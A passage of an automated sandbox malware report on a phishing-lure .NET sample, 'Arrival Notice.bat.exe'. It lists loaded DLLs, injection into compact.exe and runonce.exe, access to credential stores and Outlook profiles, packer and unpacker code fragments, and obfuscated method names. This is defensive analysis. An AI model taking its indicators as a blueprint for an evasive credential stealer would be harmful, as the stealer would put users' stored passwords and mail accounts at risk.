              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: ieframe.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: netapi32.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: wkscli.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: mlang.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: winsqlite3.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: vaultcli.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: edputil.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: appresolver.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: slc.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: sppc.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: apphelp.dll
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeSection loaded: wininet.dll
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeSection loaded: mswsock.dll
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeSection loaded: dnsapi.dll
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeSection loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeSection loaded: rasadhlp.dll
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeSection loaded: fwpuclnt.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: dwrite.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: textshaping.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: amsi.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: msasn1.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: gpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: windowscodecs.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: ieframe.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: netapi32.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wkscli.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: mlang.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: winsqlite3.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: vaultcli.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: cryptbase.dll
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeSection loaded: wininet.dll
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeSection loaded: mswsock.dll
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeSection loaded: dnsapi.dll
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeSection loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeSection loaded: fwpuclnt.dll
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeSection loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Windows\SysWOW64\compact.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
              Source: Arrival Notice.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: Arrival Notice.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Arrival Notice.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: compact.pdbGCTL source: Arrival Notice.bat.exe, 00000008.00000002.2003995560.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000011.00000002.4144521015.0000000001488000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000011.00000000.1929042944.00000000003CE000.00000002.00000001.01000000.0000000E.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000000.2071219488.00000000003CE000.00000002.00000001.01000000.0000000E.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000019.00000000.3388459052.00000000003CE000.00000002.00000001.01000000.0000000E.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 0000001B.00000000.3532932698.00000000003CE000.00000002.00000001.01000000.0000000E.sdmp
              Source: Binary string: runonce.pdbGCTL source: -6qxw.exe, 00000018.00000002.3465848130.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000019.00000002.4144533509.00000000009C8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tZby.pdb source: Arrival Notice.bat.exe, dLrZsz.exe.0.dr
              Source: Binary string: wntdll.pdbUGP source: Arrival Notice.bat.exe, 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000012.00000002.4146136991.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000012.00000003.2003900659.0000000002837000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000012.00000003.2005695081.00000000029EB000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000012.00000002.4146136991.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4146272904.0000000004A8E000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000001A.00000003.3467174209.000000000473C000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000003.3464510823.0000000004587000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4146272904.00000000048F0000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: FPJa.pdbSHA256$ source: OdR8akYyHwr3ISR[1].exe.18.dr, -6qxw.exe.18.dr
              Source: Binary string: wntdll.pdb source: Arrival Notice.bat.exe, Arrival Notice.bat.exe, 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000012.00000002.4146136991.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000012.00000003.2003900659.0000000002837000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000012.00000003.2005695081.00000000029EB000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000012.00000002.4146136991.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4146272904.0000000004A8E000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000001A.00000003.3467174209.000000000473C000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000003.3464510823.0000000004587000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4146272904.00000000048F0000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: tZby.pdbSHA2562 source: Arrival Notice.bat.exe, dLrZsz.exe.0.dr
              Source: Binary string: compact.pdb source: Arrival Notice.bat.exe, 00000008.00000002.2003995560.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000011.00000002.4144521015.0000000001488000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: runonce.pdb source: -6qxw.exe, 00000018.00000002.3465848130.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000019.00000002.4144533509.00000000009C8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: FPJa.pdb source: OdR8akYyHwr3ISR[1].exe.18.dr, -6qxw.exe.18.dr

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: Arrival Notice.bat.exe, MainForm.cs.Net Code: LateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{0,new string[3]{EIK[0],EIK[1],"Client"}}, (string[])null, (bool[])null)
              Source: dLrZsz.exe.0.dr, MainForm.cs.Net Code: LateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{0,new string[3]{EIK[0],EIK[1],"Client"}}, (string[])null, (bool[])null)
              Source: OdR8akYyHwr3ISR[1].exe.18.dr, Login.cs.Net Code: LateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{0,new string[3]{EIK[0],EIK[1],"Inventory_Management"}}, (string[])null, (bool[])null)
              Source: -6qxw.exe.18.dr, Login.cs.Net Code: LateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{0,new string[3]{EIK[0],EIK[1],"Inventory_Management"}}, (string[])null, (bool[])null)
              .NET source code contains potential unpacker
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, gp4U7sEhP5rusid8QZ.cs.Net Code: SQp6lDomKw System.Reflection.Assembly.Load(byte[])
              Source: 0.2.Arrival Notice.bat.exe.8160000.5.raw.unpack, gp4U7sEhP5rusid8QZ.cs.Net Code: SQp6lDomKw System.Reflection.Assembly.Load(byte[])
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, gp4U7sEhP5rusid8QZ.cs.Net Code: SQp6lDomKw System.Reflection.Assembly.Load(byte[])
              Source: 0.2.Arrival Notice.bat.exe.5fe0000.2.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
              Source: OdR8akYyHwr3ISR[1].exe.18.dr, Login.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
              Source: -6qxw.exe.18.dr, Login.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
              Source: Arrival Notice.bat.exeStatic PE information: 0xC0621386 [Tue Apr 12 02:16:38 2072 UTC]
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 0_2_0822BBB5 push FFFFFF8Bh; iretd 0_2_0822BBB7
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_00418141 push eax; ret 8_2_00418149
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_00407954 push esp; retf 8_2_00407956
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_004021C8 push 9A9BCBBFh; retf 8_2_004021CD
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0041426D push esp; iretd 8_2_0041426E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_00407A02 push esp; retf 8_2_00407A07
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0041E303 push edi; iretd 8_2_0041E33C
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_00418421 push esp; iretd 8_2_0041843F
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_00411CC2 push eax; retf 8_2_00411CC6
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_004035D0 push eax; ret 8_2_004035D2
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_00413E00 push es; retn 4BB0h8_2_00413DFF
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_00420633 push ds; iretd 8_2_00420642
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0154225F pushad ; ret 8_2_015427F9
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015427FA pushad ; ret 8_2_015427F9
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015709AD push ecx; mov dword ptr [esp], ecx8_2_015709B6
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0154283D push eax; iretd 8_2_01542858
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0153C54F push 8B014C67h; ret 13_2_0153C554
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0153C54D pushfd ; ret 13_2_0153C54E
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0153C9D7 push edi; ret 13_2_0153C9D9
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_014F09AD push ecx; mov dword ptr [esp], ecx13_2_014F09B6
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_014C1FEC push eax; iretd 13_2_014C1FED
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_01547E99 push ecx; ret 13_2_01547EAC
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0042C161 push edx; ret 13_2_0042C16A
              Source: Arrival Notice.bat.exeStatic PE information: section name: .text entropy: 7.936469180639003
              Source: dLrZsz.exe.0.drStatic PE information: section name: .text entropy: 7.936469180639003
              Source: OdR8akYyHwr3ISR[1].exe.18.drStatic PE information: section name: .text entropy: 7.946479184447168
              Source: -6qxw.exe.18.drStatic PE information: section name: .text entropy: 7.946479184447168
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, CR92NoKJkHxgS8LFll.csHigh entropy of concatenated method names: 'uTCF2oKyBj', 'pEWFrQXKRA', 'gDhFjHnytB', 'dKlFJXLR2m', 'n4VFEyIByK', 'rF4jcYCdtX', 'Lp2jhw4uDt', 'w5HjTAcMqJ', 'PJ3jQR7ABm', 'VAQjfjJ4u2'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, i0ug0kfcI7hQblW2S4.csHigh entropy of concatenated method names: 'VSn0KjpqAx', 'VRD0yCQ5IO', 'nvO09ZdCLq', 'unt0nFmavx', 'byq0PTJC8u', 'ACX0CiqbWZ', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, pQFiwU6fgfEbmJWq1a.csHigh entropy of concatenated method names: 'FGUkJk6SHm', 'IlekE3YHeK', 'HyskHMo95q', 'MRfkREhqXR', 'abAkgGrMR9', 'eNokqJkHxg', 'FZiedSA9E1N2vHqJGR', 'JSTqGrjQbLdWw2It1G', 'A78kkacf2D', 'lxfkGfJ94F'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, kUUIwyxysMo95qiRfE.csHigh entropy of concatenated method names: 'vU3u3OUELb', 'bWAuMQOWlj', 'mFguIiKnj2', 'x0ouxWsolY', 'rtNug3NgCb', 'iNDuqRD2MI', 'qChu5MW0B8', 'kI7u0DaXqH', 'o3uuY17d1T', 'J86u4jLAeP'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, UqXR0rBKwYl6KpbAGr.csHigh entropy of concatenated method names: 'QiPj7IonL8', 'OlJjwnVdk9', 'vEOu9ZynlC', 'L2SunUfJfm', 'JJXuCovRdD', 'SWYuUNQmJ0', 'jpjuZ0EpLD', 'ngWuikrn2S', 'd6PuODrBrw', 'IX1uVmefNo'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, EX3wVfr004eVeKYXVR.csHigh entropy of concatenated method names: 'Dispose', 'EKakfYdB21', 'fuL8yXHtKY', 'p0Bee6mwY6', 'GNckt6FmWn', 't28kz8CiDK', 'ProcessDialogKey', 'J5F8p0ug0k', 'UI78khQblW', 'eS488ToZcT'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, OTisMayLhlOoUGF8U3.csHigh entropy of concatenated method names: 'pFLuw2ZVAPcASAWtvIj', 'CqaUOvZOxj6xjYUme9P', 'qaYCEnZGqWpNIPJ2prY', 'lPxF0HJbfV', 'uUCFYJvr88', 'JGvF4cS8W7', 'oT4m94ZMDZB3vdVXo89', 'PiUu5sZfwbTchOpK7FT'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, WoZcTFtqamvQ1L7sy1.csHigh entropy of concatenated method names: 'BATYkEWZsl', 'UMaYGbv2Uu', 'BjgY6rvaik', 'Ts7YAQQun5', 'anEYri9qJf', 'iLnYj8VNBm', 'CttYFmxsHL', 'jIL0TmIWYC', 'ffo0QxpoUX', 'AQk0fFXJQR'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, okDYTwZf7PavGHEBLr.csHigh entropy of concatenated method names: 'DyfJAcplLX', 'OSvJu1fy5L', 'lxEJFxfAeP', 'it7FtUjEfm', 'hOGFzeTMFH', 'vHfJpcf8yr', 'hrWJkAnsQG', 'KivJ87lFB2', 'KnnJGEckMP', 'ojcJ6O602i'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, x5EawHkG4nxGw0BwuPK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Shh4P1Tf6p', 'T1O4eNawhP', 'n1R4vMe3at', 'DEH4oKYU7P', 'msa4cEl0d8', 'hBk4hZRj0D', 'Wef4TF4mE1'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, dUh4iSmXZmKJxCUiTq.csHigh entropy of concatenated method names: 'XedSIqJu7N', 'WoJSxGnBX7', 'XLiSK2iPGR', 'nLySyCfJuV', 'lBOSnLkVSu', 'LV6SCG4TFf', 'TJ7SZ622f1', 'TGGSiA67hh', 'oxKSVIylQu', 'kukSXSvuTr'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, ztgapEOKN2bHXgpNfF.csHigh entropy of concatenated method names: 'bKUJN4vMXN', 'ttOJDKN34U', 'XuqJlMdCTI', 'eZBJ3D3S4v', 'cNZJ7cARLL', 'IQKJMrxPEC', 'lANJwHHVOW', 'YLtJIsoiZi', 'RkPJxs2CI2', 'dP8JB040oW'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, KkiYalvb0pSJvl1BpG.csHigh entropy of concatenated method names: 'ToString', 'sYFqXtMihq', 'Dkuqy8UAR4', 'UJZq9RwYDt', 'yyPqnAAptg', 'BGpqCfEqpC', 'lmOqU5Ih8N', 'j8dqZr3FFa', 'XlaqiG9YC6', 'pbuqOlhhBY'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, zSvR4xhHfejwjcBEkU.csHigh entropy of concatenated method names: 'V4l5QYescE', 'Nru5tSC6PW', 'zbO0p31AXB', 'TbT0kMBODc', 'dNo5XpRvtS', 'Ep55bIGSDC', 'pTf5mNPpQo', 'BtH5POhXwL', 'G9J5eprHT7', 'fjh5viL4uU'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, gp4U7sEhP5rusid8QZ.csHigh entropy of concatenated method names: 'vShG2QsdlJ', 'f6yGARiZYo', 'aMPGrEP2l3', 'nt9GuACMOu', 'BLXGjpDYXb', 'JmJGFllwV2', 'NNwGJLX8pB', 'qh4GEJowEq', 'TE2G16VGe6', 'zaTGHTaJkC'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, NGaMtZkpJEhdo2rIJPK.csHigh entropy of concatenated method names: 'umYYNlaQZU', 'KYYYDO7g8Z', 'oQPYlQ51no', 'jG3Y3KDyLF', 'EiJY7SmX3O', 'zRQYMC7td0', 'L86YwjU657', 'hnnYIWhprc', 'fkjYxlXhIc', 'WN4YBk2hSb'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, Kk6SHmInle3YHeKsC7.csHigh entropy of concatenated method names: 'nj1rPLrfW6', 'FJsreQOuF6', 'vtNrvt6EiI', 'GqQroG2Fkw', 'BfBrcdwEJT', 'aQKrhDgKKx', 'WfRrTmNnnf', 'I5nrQc6uL8', 'wZ4rfMec6x', 'J5grti9yQq'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, KkVjK88ZrPqOcWdeBx.csHigh entropy of concatenated method names: 'sL4lBrjvh', 'ziS3lZMBD', 'CGmMawGcs', 'sxtwSRVc8', 'h82xWGu91', 'EG5BY9YM9', 'F7AapfuoCtvPfuKBns', 'y8AmHmPmfm0RHsDZr9', 'jFg0JTtWZ', 'CpI4JfLrl'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, yc6FmWQnW288CiDKC5.csHigh entropy of concatenated method names: 'AMr0AIrI2V', 'dY60r447El', 'RkZ0uOhNdK', 'kH50jll1Jb', 'SXb0FP1jCu', 'fIa0J3pgC1', 'g0R0Exaw5L', 'xSL013xYyE', 'Ucm0HGj4DI', 'tBG0R6twO5'
              Source: 0.2.Arrival Notice.bat.exe.8160000.5.raw.unpack, CR92NoKJkHxgS8LFll.csHigh entropy of concatenated method names: 'uTCF2oKyBj', 'pEWFrQXKRA', 'gDhFjHnytB', 'dKlFJXLR2m', 'n4VFEyIByK', 'rF4jcYCdtX', 'Lp2jhw4uDt', 'w5HjTAcMqJ', 'PJ3jQR7ABm', 'VAQjfjJ4u2'
              Source: 0.2.Arrival Notice.bat.exe.8160000.5.raw.unpack, i0ug0kfcI7hQblW2S4.csHigh entropy of concatenated method names: 'VSn0KjpqAx', 'VRD0yCQ5IO', 'nvO09ZdCLq', 'unt0nFmavx', 'byq0PTJC8u', 'ACX0CiqbWZ', 'Next', 'Next', 'Next', 'NextBytes'
